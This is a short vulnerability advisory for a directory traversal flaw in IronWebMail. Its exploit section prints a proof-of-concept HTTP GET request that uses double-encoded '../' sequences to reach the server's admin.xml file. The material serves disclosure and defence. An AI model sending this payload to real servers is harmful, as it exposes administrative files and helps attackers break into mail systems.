IronWebMail Directory Traversal Information Disclosure Vulnerability

info
discussion
exploit
solution
references

IronWebMail Directory Traversal Information Disclosure Vulnerability

Attackers use a standard web browser to exploit this issue.

The following proof-of-concept GET request data demonstrates this issue:

GET /IM_FILE(%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/admin.xml) HTTP/1.0[CRLF][CRLF]